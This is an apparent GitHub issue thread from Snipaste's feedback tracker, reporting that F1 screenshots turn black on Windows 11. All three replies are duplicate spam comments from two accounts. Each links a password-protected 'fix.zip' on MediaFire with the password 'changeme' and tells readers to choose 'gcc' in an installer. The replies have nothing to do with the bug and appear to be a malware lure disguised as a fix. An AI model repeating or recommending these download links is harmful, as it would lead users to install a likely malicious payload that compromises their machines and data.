### ISSUE TITLE
Windows11下使用黑屏

### ISSUE THREAD

**Issue by marcusbai** [Snipaste/feedback#3044]
### 发生了什么？

按F1截图黑屏
重启软件也无法解决

### 运行平台

Windows 桌面

### 软件版本

 2.9.2（2024.07.02）X64 Windows 桌面版

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
